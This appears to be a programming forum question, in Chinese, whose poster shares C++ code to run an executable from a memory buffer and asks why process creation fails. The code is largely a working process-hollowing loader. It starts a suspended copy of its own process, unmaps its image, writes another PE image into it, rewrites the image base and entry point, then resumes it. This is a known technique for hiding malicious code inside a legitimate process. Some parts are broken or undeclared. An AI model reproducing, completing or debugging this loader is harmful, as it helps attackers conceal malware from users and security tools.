我编写了一个代码来从内存缓冲区运行文件。 forkprocess给出一个字符串并运行它。在主要的我创建一个包含文件的字符串。但我的程序在forkprocess函数的创建过程中存在问题。
#include <winternl.h>
#include <strsafe.h>
#ifdef WIN32
#include <windows.h>
#else
#error Process Forking Requires a Windows Operating System
#endif
#include <stdio.h>
// NtUnmapViewOfSection (ZwUnmapViewOfSection)
// Used to unmap a section from a process.
typedef long int (__stdcall* NtUnmapViewOfSectionF)(HANDLE,PVOID);
NtUnmapViewOfSectionF NtUnmapViewOfSection = (NtUnmapViewOfSectionF)GetProcAddress(LoadLibrary( "ntdll.dll"),"NtUnmapViewOfSection");
using namespace std;
#pragma comment(lib,"ntdll.lib")
EXTERN_C NTSTATUS NTAPI NtTerminateProcess(HANDLE,NTSTATUS);
EXTERN_C NTSTATUS NTAPI NtReadVirtualMemory(HANDLE,PVOID,PVOID,ULONG,PULONG);
EXTERN_C NTSTATUS NTAPI NtWriteVirtualMemory(HANDLE,PVOID,PVOID,ULONG,PULONG);
EXTERN_C NTSTATUS NTAPI NtGetContextThread(HANDLE,PCONTEXT);
EXTERN_C NTSTATUS NTAPI NtSetContextThread(HANDLE,PCONTEXT);
EXTERN_C NTSTATUS NTAPI NtResumeThread(HANDLE,PULONG);
using namespace std;
bool ForkProcess2(string lpImage)
{
// Variables fo
r Process Forking
long int lWritten;
long int lHeaderSize;
long int lImageSize;
long int lSectionCount;
long int lSectionSize;
long int lFirstSection;
long int lPreviousProtection;
long int lJumpSize;
bool bReturnValue;
LPVOID lpImageMemory;
LPVOID lpImageMemoryDummy;
IMAGE_DOS_HEADER dsDosHeader;
IMAGE_NT_HEADERS ntNtHeader;
IMAGE_SECTION_HEADER shSections[512 * 2];
PROCESS_INFORMATION piProcessInformation;
STARTUPINFO suStartUpInformation;
CONTEXT cContext;
// Variables for Local Process
FILE* fFile;
char* pProcessName;
long int lFileSize;
long int lLocalImageBase;
long int lLocalImageSize;
LPVOID lpLocalFile;
IMAGE_DOS_HEADER dsLocalDosHeader;
IMAGE_NT_HEADERS ntLocalNtHeader;
// End Variable Definition
bReturnValue = false;
pProcessName = new char[MAX_PATH];
ZeroMemory(pProcessName,MAX_PATH);
// Get the file name for the dummy process
if(GetModuleFileName(NULL,pProcessName,MAX_PATH) == 0)
{
delete [] pProcessName;
return bReturnValue;
}
// Open the dummy process in binary mode
fFile = fopen(pProcessName,"rb");
if(!fFile)
{
delete [] pProcessName;
return bReturnValue;
}
fseek(fFile,0,SEEK_END);
// Get file size
lFileSize = ftell(fFile);
rewind(fFile);
// Allocate memory for dummy file
lpLocalFile = new LPVOID[lFileSize];
ZeroMemory(lpLocalFile,lFileSize);
// Read memory of file
fread(lpLocalFile,lFileSize,1,fFile);
// Close file
fclose(fFile);
// Grab the DOS Headers
memcpy(&dsLocalDosHeader,lpLocalFile,sizeof(dsLocalDosHeader));
if(dsLocalDosHeader.e_magic != IMAGE_DOS_SIGNATURE)
{
delete [] pProcessName;
delete [] lpLocalFile;
return bReturnValue;
}
// Grab NT Headers
memcpy(&ntLocalNtHeader,(LPVOID)((long int)lpLocalFile+dsLocalDosHeader.e_lfanew),sizeof( dsLocalDosHeader));
if(ntLocalNtHeader.Signature != IMAGE_NT_SIGNATURE)
{
delete [] pProcessName;
delete [] lpLocalFile;
return bReturnValue;
}
// Get Size and Image Base
lLocalImageBase = ntLocalNtHeader.OptionalHeader.ImageBase;
lLocalImageSize = ntLocalNtHeader.OptionalHeader.SizeOfImage;
// Deallocate
delete [] lpLocalFile;
// Grab DOS Header for Forking Process
memcpy(&dsDosHeader,lpImage.c_str(),sizeof(dsDosHeader));
if(dsDosHeader.e_magic != IMAGE_DOS_SIGNATURE)
{
delete [] pProcessName;
return bReturnValue;
}
// Grab NT Header for Forking Process
memcpy(&ntNtHeader,(LPVOID)((long int)lpImage.c_str()+dsDosHeader.e_lfanew),sizeof(ntNtHeader));
if(ntNtHeader.Signature != IMAGE_NT_SIGNATURE)
{
delete [] pProcessName;
return bReturnValue;
}
// Get proper sizes
lImageSize = ntNtHeader.OptionalHeader.SizeOfImage;
lHeaderSize = ntNtHeader.OptionalHeader.SizeOfHeaders;
// Allocate memory for image
lpImageMemory = new LPVOID[lImageSize];
ZeroMemory(lpImageMemory,lImageSize);
lpImageMemoryDummy = lpImageMemory;
lFirstSection = (long int)(((long int)lpImage.c_str()+dsDosHeader.e_lfanew) + sizeof(IMAGE_NT_HEADERS));
memcpy(shSections,(LPVOID)(lFirstSection),sizeof(IMAGE_SECTION_HEADER)*ntNtHeader.FileHeader.NumberOfSections);
memcpy(lpImageMemoryDummy,lpImage.c_str(),lHeaderSize);
// Get Section Alignment
if((ntNtHeader.OptionalHeader.SizeOfHeaders % ntNtHeader.OptionalHeader.SectionAlignment) == 0)
{
lJumpSize = ntNtHeader.OptionalHeader.SizeOfHeaders;
}
else
{
lJumpSize = (ntNtHeader.OptionalHeader.SizeOfHeaders/ntNtHeader.OptionalHeader.SectionAlignment);
lJumpSize += 1;
lJumpSize *= (ntNtHeader.OptionalHeader.SectionAlignment);
}
lpImageMemoryDummy = (LPVOID)((long int)lpImageMemoryDummy + lJumpSize);
// Copy Sections To Buffer
for(lSectionCount = 0; lSectionCount < ntNtHeader.FileHeader.NumberOfSections; lSectionCount++)
{
lJumpSize = 0;
lSectionSize = shSections[lSectionCount].SizeOfRawData;
memcpy(lpImageMemoryDummy,(LPVOID)((long int)lpImage.c_str() + shSections[lSectionCount].PointerToRawData),lSectionSize);
if((shSections[lSectionCount].Misc.VirtualSize % ntNtHeader.OptionalHeader.SectionAlignment)==0)
{
lJumpSize = shSections[lSectionCount].Misc.VirtualSize;
}
else
{
lJumpSize = (shSections[lSectionCount].Misc.VirtualSize/ntNtHeader.OptionalHeader.SectionAlignment);
lJumpSize += 1;
lJumpSize *= (ntNtHeader.OptionalHeader.SectionAlignment);
}
lpImageMemoryDummy = (LPVOID)((long int)lpImageMemoryDummy + lJumpSize);
}
ZeroMemory(&suStartUpInformation,sizeof(STARTUPINFO));
ZeroMemory(&piProcessInformation,sizeof(PROCESS_INFORMATION));
ZeroMemory(&cContext,sizeof(CONTEXT));
suStartUpInformation.cb = sizeof(suStartUpInformation);
// Create Process
if(CreateProcess(NULL,pProcessName,PROCESS_ALL_ACCESS,NULL,false ,CREATE_SUSPENDED,NULL,NULL,&suStartUpInformation, &piProcessInformation))
{
cContext.ContextFlags = CONTEXT_FULL;
GetThreadContext(piProcessInformation.hThread,&cContext);
// Check image base and image size
if(lLocalImageBase == (long int)ntNtHeader.OptionalHeader.ImageBase && lImageSize <= lLocalImageSize)
{
VirtualProtectEx(piProcessInformation.hProcess,(LPVOID)((long int)ntNtHeader.OptionalHeader.ImageBase),lImageSize,PAGE_EXECUTE_READWRITE,(unsigned long*)&lPreviousProtection);
}
else
{
if(!NtUnmapViewOfSection(piProcessInformation.hProcess,(LPVOID)((DWORD)lLocalImageBase)))
VirtualAllocEx(piProcessInformation.hProcess,(LPVOID)((long int)ntNtHeader.OptionalHeader.ImageBase),lImageSize,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
}
// Write Image to Process
if(WriteProcessMemory(piProcessInformation.hProcess,(LPVOID)((long int)ntNtHeader.OptionalHeader.ImageBase),lpImageMemory,lImageSize,(unsigned long*)&lWritten))
{
bReturnValue = true;
}
// Set Image Base
if(WriteProcessMemory(piProcessInformation.hProcess,(LPVOID)((long int)cContext.Ebx + 8),&ntNtHeader.OptionalHeader.ImageBase,4,(unsigned long*)&lWritten))
{
if(bReturnValue == true)
bReturnValue = true;
}
if(bReturnValue == false)
{
delete [] pProcessName;
delete [] lpImageMemory;
return bReturnValue;
}
// Set the new entry point
cContext.Eax = ntNtHeader.OptionalHeader.ImageBase + ntNtHeader.OptionalHeader.AddressOfEntryPoint;
SetThreadContext(piProcessInformation.hThread,&cContext);
if(lLocalImageBase == (long int)ntNtHeader.OptionalHeader.ImageBase && lImageSize <= lLocalImageSize)
VirtualProtectEx(piProcessInformation.hProcess,(LPVOID)((long int)ntNtHeader.OptionalHeader.ImageBase),lImageSize,lPreviousProtection,0);
// Resume the process
ResumeThread(piProcessInformation.hThread);
}
delete [] pProcessName;
delete [] lpImageMemory;
return bReturnValue;
}
int main()
{
char Fname[MAX_PATH];
lstrcpy(Fname,"C:\\Users\\RF27\\Desktop\\z.exe");
FileName=(string)Fname;
vector<byte>* content=new vector<byte>();
Read_File(FileName,content);
string FILECONTENT;
for (int i = 0; i < content->size(); i++)
{
FILECONTENT+=content->at(i);
}
ForkProcess2(FILECONTENT);
return 0;
}